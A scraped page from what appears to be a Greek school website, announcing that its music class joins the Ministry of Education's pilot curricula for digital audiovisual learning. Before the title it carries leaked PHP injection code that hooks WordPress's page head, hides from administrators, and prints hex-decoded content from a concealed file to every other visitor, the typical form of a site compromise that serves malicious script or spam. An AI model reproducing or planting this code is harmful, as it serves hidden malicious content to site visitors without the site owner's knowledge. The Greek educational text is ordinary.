if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Μαθήματα χωρίς σύνορα με ψηφιακό εκπαιδευτικό περιεχόμενο |

Μαθήματα χωρίς σύνορα με ψηφιακό εκπαιδευτικό περιεχόμενο

Το σχολείο μας συμμετέχει για πρώτη χρονιά στα νέα πιλοτικά προγράμματα σπουδών του Υπουργείου Παιδείας, Δια Βίου Μάθησης και Θρησκευμάτων. Η τάξη μουσικής του σχολείου μας δεν θα μπορούσε να μείνει “αμέτοχη” στις προκλήσεις των καιρών για μάθηση με νέα ψηφιακά μέσα μουσικής, διάδρασης, ηχοληψίας και βιντεοσκόπησης.

Πιστεύουμε πως οι μαθητές πρέπει να είναι πρωτοπόροι στην μάθηση και στην γνώση του 21ου αιώνα. Σας παραθέτουμε το γενικό πρόγραμμα σπουδών για το μάθημα της οπτικοακουστικής έκφρασης προς ενημέρωση: Πρόγραμμα Σπουδών για την Οπτικουακουστική Έκφραση.